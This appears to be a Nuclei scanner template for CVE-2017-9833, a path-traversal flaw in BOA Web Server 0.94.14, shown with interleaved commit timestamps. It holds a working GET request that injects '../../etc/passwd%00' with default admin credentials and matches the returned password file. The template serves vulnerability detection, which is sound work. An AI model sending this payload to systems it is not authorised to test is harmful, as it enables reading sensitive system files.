2022-03-08 06:21:07 +00:00
id : CVE-2017-9833
2022-03-06 22:58:38 +00:00
info :
2022-04-15 16:39:44 +00:00
name : BOA Web Server 0.94.14 - Arbitrary File Access
2022-03-06 22:58:38 +00:00
author : 0x_Akoko
severity : high
2022-04-15 16:39:44 +00:00
description : BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials.
2023-09-06 13:22:34 +00:00
remediation : |
Upgrade to a patched version of BOA Web Server or apply the necessary security patches.
2022-03-06 22:58:38 +00:00
reference :
- https://www.exploit-db.com/exploits/42290
2023-03-02 22:00:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-9833
2022-05-17 09:18:12 +00:00
- https://pastebin.com/raw/rt7LJvyF
- https://www.exploit-db.com/exploits/42290/
2022-03-08 06:53:29 +00:00
classification :
2023-02-16 05:47:13 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2022-03-08 06:53:29 +00:00
cve-id : CVE-2017-9833
cwe-id : CWE-22
2023-07-11 19:49:27 +00:00
epss-score : 0.48044
2023-08-31 11:46:18 +00:00
epss-percentile : 0.97006
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : boa
product : boa
tags : boa,lfr,lfi,cve,cve2017,edb
2022-03-06 22:58:38 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-03-06 22:58:38 +00:00
- method : GET
path :
- "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200